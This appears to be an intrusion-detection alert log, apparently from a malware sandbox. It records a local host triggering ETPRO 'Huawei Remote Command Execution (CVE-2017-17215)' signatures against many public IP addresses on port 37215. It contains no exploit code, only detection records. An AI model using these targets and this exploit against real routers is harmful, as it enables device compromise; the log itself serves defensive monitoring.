                                                        06/13/24-21:33:05.011877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353437215192.168.2.14156.52.12.205
                                                        06/13/24-21:32:34.199405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624037215192.168.2.14197.124.117.189
                                                        06/13/24-21:33:02.912607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979837215192.168.2.1441.255.227.251
                                                        06/13/24-21:32:42.405248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4069837215192.168.2.14197.229.220.252
                                                        06/13/24-21:32:46.502724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242437215192.168.2.1441.204.14.135
                                                        06/13/24-21:32:11.508983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870037215192.168.2.14197.65.41.106
                                                        06/13/24-21:32:17.695022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452637215192.168.2.14156.106.245.169
                                                        06/13/24-21:32:11.487013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400837215192.168.2.14156.55.70.199
                                                        06/13/24-21:33:02.912901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062437215192.168.2.14197.84.99.115
                                                        06/13/24-21:32:38.304365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659437215192.168.2.1441.56.104.144
                                                        06/13/24-21:31:59.175738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255637215192.168.2.14197.51.77.50
                                                        06/13/24-21:32:30.127443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3502837215192.168.2.14156.161.90.145
                                                        06/13/24-21:33:02.910011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950237215192.168.2.1441.138.67.173
                                                        06/13/24-21:32:40.372674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5562637215192.168.2.1441.83.47.234
                                                        06/13/24-21:32:44.450735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324237215192.168.2.14197.13.174.94
                                                        06/13/24-21:33:15.272847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025637215192.168.2.1441.95.237.156
                                                        06/13/24-21:32:05.348796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904437215192.168.2.14156.149.190.62
                                                        06/13/24-21:32:13.567878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454237215192.168.2.14197.128.40.154
                                                        06/13/24-21:32:25.994247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912437215192.168.2.14197.230.198.221
                                                        06/13/24-21:32:01.237670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498437215192.168.2.14197.25.0.100
                                                        06/13/24-21:32:32.170579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748237215192.168.2.1441.75.92.25
                                                        06/13/24-21:32:34.192999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543037215192.168.2.14156.98.47.206
                                                        06/13/24-21:32:17.672695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257437215192.168.2.14156.123.131.224
                                                        06/13/24-21:32:58.823321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683837215192.168.2.14156.60.8.145
                                                        06/13/24-21:32:13.569356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957237215192.168.2.14197.47.175.37
                                                        06/13/24-21:32:32.164633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279837215192.168.2.14197.63.77.22
                                                        06/13/24-21:32:13.567166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713837215192.168.2.14197.57.43.74
                                                        06/13/24-21:32:01.221374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925437215192.168.2.1441.13.137.193
                                                        06/13/24-21:32:52.657212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007437215192.168.2.14156.252.157.46
                                                        06/13/24-21:32:38.316860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893637215192.168.2.1441.211.92.34
                                                        06/13/24-21:32:42.408953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599637215192.168.2.14197.81.246.162
                                                        06/13/24-21:32:58.821247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482037215192.168.2.14156.122.131.115
                                                        06/13/24-21:32:30.099253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726237215192.168.2.14156.95.2.171
                                                        06/13/24-21:31:59.199959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605837215192.168.2.14156.52.65.236
                                                        06/13/24-21:32:11.488946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4592637215192.168.2.1441.108.37.131
                                                        06/13/24-21:32:01.221638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407837215192.168.2.1441.208.236.211
                                                        06/13/24-21:32:07.402477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941437215192.168.2.14156.26.77.175
                                                        06/13/24-21:32:15.633340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336237215192.168.2.14156.184.204.160
                                                        06/13/24-21:32:19.729304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779637215192.168.2.1441.104.204.149
                                                        06/13/24-21:32:34.215431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029437215192.168.2.1441.243.61.158
                                                        06/13/24-21:33:15.256452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222637215192.168.2.1441.243.108.3
                                                        06/13/24-21:32:19.731282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688037215192.168.2.14156.12.50.62
                                                        06/13/24-21:32:52.677800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989637215192.168.2.1441.219.47.127
                                                        06/13/24-21:33:00.889334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013637215192.168.2.14197.131.58.0
                                                        06/13/24-21:32:13.547362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501237215192.168.2.14197.118.12.19
                                                        06/13/24-21:32:36.247971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023237215192.168.2.1441.135.174.24
                                                        06/13/24-21:32:42.405955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348237215192.168.2.1441.241.128.13
                                                        06/13/24-21:32:17.678038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5617837215192.168.2.1441.181.42.41
                                                        06/13/24-21:32:48.552801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461837215192.168.2.14156.57.161.229
                                                        06/13/24-21:32:52.680592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615037215192.168.2.1441.26.56.230
                                                        06/13/24-21:31:59.176562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709637215192.168.2.14197.191.97.104
                                                        06/13/24-21:32:23.836844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827437215192.168.2.14156.189.115.95
                                                        06/13/24-21:32:46.508481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993037215192.168.2.14197.229.212.123
                                                        06/13/24-21:32:07.401098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164037215192.168.2.14197.194.190.179
                                                        06/13/24-21:32:09.452819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570037215192.168.2.14156.16.131.214
                                                        06/13/24-21:32:23.832919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534437215192.168.2.14156.249.166.119
                                                        06/13/24-21:32:09.438804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912237215192.168.2.14156.137.73.8
                                                        06/13/24-21:33:07.060154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5010437215192.168.2.14156.231.128.45
                                                        06/13/24-21:32:15.634436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020637215192.168.2.14197.207.64.104
                                                        06/13/24-21:32:48.550749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563637215192.168.2.1441.8.182.155
                                                        06/13/24-21:32:21.802881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285237215192.168.2.14197.135.118.184
                                                        06/13/24-21:32:23.940881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927637215192.168.2.14197.38.157.212
                                                        06/13/24-21:32:52.655126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927037215192.168.2.14156.32.195.122
                                                        06/13/24-21:32:54.711141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5095037215192.168.2.1441.235.27.235
                                                        06/13/24-21:32:36.245472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826837215192.168.2.14156.128.196.74
                                                        06/13/24-21:32:13.570364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980637215192.168.2.1441.64.152.215
                                                        06/13/24-21:32:48.570620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597437215192.168.2.1441.222.1.230
                                                        06/13/24-21:32:50.631030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694837215192.168.2.14156.212.240.178
                                                        06/13/24-21:32:30.091820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896837215192.168.2.14156.126.86.165
                                                        06/13/24-21:32:52.659582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283837215192.168.2.14156.200.190.4
                                                        06/13/24-21:32:54.710385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5535037215192.168.2.1441.242.62.80
                                                        06/13/24-21:32:40.357478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717237215192.168.2.1441.44.149.152
                                                        06/13/24-21:32:17.695295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940437215192.168.2.14156.138.62.54
                                                        06/13/24-21:31:57.133543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309237215192.168.2.14197.241.25.6
                                                        06/13/24-21:32:05.377668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524837215192.168.2.1441.106.82.75
                                                        06/13/24-21:32:23.835237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728837215192.168.2.14156.15.106.134
                                                        06/13/24-21:32:25.992509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631037215192.168.2.14197.236.44.157
                                                        06/13/24-21:32:15.630975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908637215192.168.2.1441.181.4.235
                                                        06/13/24-21:33:13.213627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504037215192.168.2.1441.122.1.31
                                                        06/13/24-21:32:42.408659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114837215192.168.2.14156.39.43.125
                                                        06/13/24-21:33:15.258386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047237215192.168.2.1441.47.170.38
                                                        06/13/24-21:31:57.137997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309037215192.168.2.14156.45.214.160
                                                        06/13/24-21:32:56.757442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981637215192.168.2.14197.48.12.242
                                                        06/13/24-21:32:52.658684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656237215192.168.2.14156.136.138.4
                                                        06/13/24-21:33:07.058490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724437215192.168.2.14197.238.141.28
                                                        06/13/24-21:33:17.309486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808637215192.168.2.14156.15.26.160
                                                        06/13/24-21:32:56.759231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396237215192.168.2.14156.65.33.16
                                                        06/13/24-21:33:07.040447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398637215192.168.2.1441.164.167.40
                                                        06/13/24-21:33:07.056472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483437215192.168.2.14197.131.193.248
                                                        06/13/24-21:32:19.750646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080037215192.168.2.14156.213.46.56
                                                        06/13/24-21:32:42.406087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197437215192.168.2.14197.240.25.67
                                                        06/13/24-21:32:48.554494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026837215192.168.2.1441.116.234.33
                                                        06/13/24-21:32:46.524846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878037215192.168.2.14156.123.129.19
                                                        06/13/24-21:33:09.129170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481837215192.168.2.14197.77.104.116
                                                        06/13/24-21:32:30.100419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482437215192.168.2.14197.205.131.155
                                                        06/13/24-21:32:48.555808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423437215192.168.2.1441.204.43.8
                                                        06/13/24-21:32:15.638733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441037215192.168.2.1441.216.203.128
                                                        06/13/24-21:32:03.276557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381037215192.168.2.1441.112.63.221
                                                        06/13/24-21:32:19.726571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697237215192.168.2.1441.177.62.247
                                                        06/13/24-21:32:17.677031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816237215192.168.2.1441.153.45.160
                                                        06/13/24-21:33:04.993231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913037215192.168.2.14197.22.51.80
                                                        06/13/24-21:33:00.888317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631637215192.168.2.1441.90.66.122
                                                        06/13/24-21:32:09.455733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041637215192.168.2.14197.213.93.220
                                                        06/13/24-21:33:13.212525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257437215192.168.2.14156.116.138.136
                                                        06/13/24-21:32:19.731033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3786237215192.168.2.1441.230.181.14
                                                        06/13/24-21:32:36.269553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5749437215192.168.2.14156.241.188.96
                                                        06/13/24-21:32:56.755907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494837215192.168.2.14197.241.110.119
                                                        06/13/24-21:32:58.824583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466637215192.168.2.14197.127.105.254
                                                        06/13/24-21:32:19.731013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510837215192.168.2.14156.129.214.114
                                                        06/13/24-21:32:36.264123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536437215192.168.2.14197.44.178.58
                                                        06/13/24-21:33:17.306398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214437215192.168.2.1441.116.211.51
                                                        06/13/24-21:33:15.259361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887837215192.168.2.1441.176.182.113
                                                        06/13/24-21:32:52.654630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715837215192.168.2.1441.134.32.98
                                                        06/13/24-21:32:01.224287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701237215192.168.2.14197.86.129.246
                                                        06/13/24-21:32:42.407020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405637215192.168.2.14156.95.217.69
                                                        06/13/24-21:32:50.612851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970037215192.168.2.14197.176.242.26
                                                        06/13/24-21:32:58.839280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967037215192.168.2.14156.197.179.169
                                                        06/13/24-21:32:50.611878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456637215192.168.2.1441.96.226.145
                                                        06/13/24-21:33:09.088063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914037215192.168.2.1441.221.53.93
                                                        06/13/24-21:32:48.551584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707437215192.168.2.14197.11.9.182
                                                        06/13/24-21:33:11.180214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050237215192.168.2.14156.254.230.53
                                                        06/13/24-21:33:17.306258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027237215192.168.2.14156.213.158.178
                                                        06/13/24-21:32:15.606929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929037215192.168.2.14197.195.50.105
                                                        06/13/24-21:32:23.836057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5535437215192.168.2.14197.206.31.172
                                                        06/13/24-21:32:38.301183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654837215192.168.2.1441.194.249.37
                                                        06/13/24-21:32:21.786696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720037215192.168.2.14156.152.79.136
                                                        06/13/24-21:32:32.155692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658837215192.168.2.1441.131.245.62
                                                        06/13/24-21:32:38.321998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326837215192.168.2.14197.61.248.131
                                                        06/13/24-21:32:30.074895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050437215192.168.2.1441.34.46.75
                                                        06/13/24-21:32:36.248529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5143037215192.168.2.14156.87.230.170
                                                        06/13/24-21:32:44.478440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023637215192.168.2.14156.101.254.204
                                                        06/13/24-21:33:07.043055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838037215192.168.2.14156.247.221.193
                                                        06/13/24-21:32:23.832194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357637215192.168.2.14156.152.168.157
                                                        06/13/24-21:31:57.129779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083437215192.168.2.14197.168.107.124
                                                        06/13/24-21:32:21.779763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450437215192.168.2.14197.87.39.124
                                                        06/13/24-21:32:07.401531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650237215192.168.2.14156.118.80.92
                                                        06/13/24-21:32:21.786364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568637215192.168.2.14156.140.57.241
                                                        06/13/24-21:32:44.479916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152637215192.168.2.1441.220.149.89
                                                        06/13/24-21:32:38.324031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046437215192.168.2.14197.221.185.196
                                                        06/13/24-21:32:21.805867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646437215192.168.2.1441.104.153.127
                                                        06/13/24-21:32:40.376466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913437215192.168.2.1441.1.63.96
                                                        06/13/24-21:32:03.300154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780837215192.168.2.1441.90.188.92
                                                        06/13/24-21:32:32.149306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4950037215192.168.2.1441.61.241.197
                                                        06/13/24-21:32:50.610008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681637215192.168.2.14197.40.58.221
                                                        06/13/24-21:32:42.422769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040637215192.168.2.1441.88.141.243
                                                        06/13/24-21:32:50.610847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065637215192.168.2.14197.138.123.106
                                                        06/13/24-21:33:02.937319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804837215192.168.2.1441.116.149.172
                                                        06/13/24-21:32:25.992050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3736037215192.168.2.14197.11.10.72
                                                        06/13/24-21:33:00.889295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927837215192.168.2.14197.47.139.82
                                                        06/13/24-21:33:00.867803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278637215192.168.2.14156.223.15.19
                                                        06/13/24-21:33:09.112550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021637215192.168.2.1441.243.62.27
                                                        06/13/24-21:32:42.408865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057437215192.168.2.1441.159.12.242
                                                        06/13/24-21:31:59.196069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4011637215192.168.2.14197.207.130.124
                                                        06/13/24-21:32:30.098205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065237215192.168.2.14197.219.220.162
                                                        06/13/24-21:32:30.080080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911237215192.168.2.1441.121.231.194
                                                        06/13/24-21:32:42.423016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116237215192.168.2.14197.162.208.22
                                                        06/13/24-21:32:23.934408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318637215192.168.2.14156.147.143.140
                                                        06/13/24-21:32:56.753354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285437215192.168.2.1441.154.75.71
                                                        06/13/24-21:32:40.358732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876437215192.168.2.14197.83.190.174
                                                        06/13/24-21:32:44.454260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351037215192.168.2.14156.47.175.176
                                                        06/13/24-21:32:09.438825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738237215192.168.2.1441.46.243.246
                                                        06/13/24-21:33:13.212425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779837215192.168.2.14197.239.142.7
                                                        06/13/24-21:32:03.275292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318437215192.168.2.14197.126.217.241
                                                        06/13/24-21:32:23.943799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085437215192.168.2.1441.214.202.172
                                                        06/13/24-21:32:30.100869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896237215192.168.2.14156.25.239.182
                                                        06/13/24-21:33:11.172906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898437215192.168.2.14156.13.188.53
                                                        06/13/24-21:32:01.223387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828637215192.168.2.14197.142.10.152
                                                        06/13/24-21:32:17.678161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331037215192.168.2.1441.8.193.116
                                                        06/13/24-21:32:17.697705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040837215192.168.2.1441.116.73.52
                                                        06/13/24-21:32:58.823722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213837215192.168.2.14156.75.176.219
                                                        06/13/24-21:32:32.156072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4027637215192.168.2.14197.62.69.176
                                                        06/13/24-21:31:57.137780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5055037215192.168.2.14197.205.237.132
                                                        06/13/24-21:33:00.867872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103037215192.168.2.14156.161.169.160
                                                        06/13/24-21:33:07.059488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259237215192.168.2.14197.211.94.239
                                                        06/13/24-21:32:15.636186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840437215192.168.2.14197.58.63.124
                                                        06/13/24-21:32:07.419861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709837215192.168.2.1441.162.239.218
                                                        06/13/24-21:32:58.821381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276837215192.168.2.1441.44.13.179
                                                        06/13/24-21:32:40.376827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445037215192.168.2.14156.143.215.246
                                                        06/13/24-21:32:01.223823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302837215192.168.2.1441.250.201.251
                                                        06/13/24-21:32:09.439725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568037215192.168.2.14197.0.165.82
                                                        06/13/24-21:32:13.544131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529437215192.168.2.1441.12.78.27
                                                        06/13/24-21:32:01.221931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772037215192.168.2.14156.217.112.178
                                                        06/13/24-21:32:03.275469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660837215192.168.2.14156.175.107.161
                                                        06/13/24-21:32:36.268836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003637215192.168.2.14197.45.227.7
                                                        06/13/24-21:32:58.841556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316237215192.168.2.14156.65.156.239
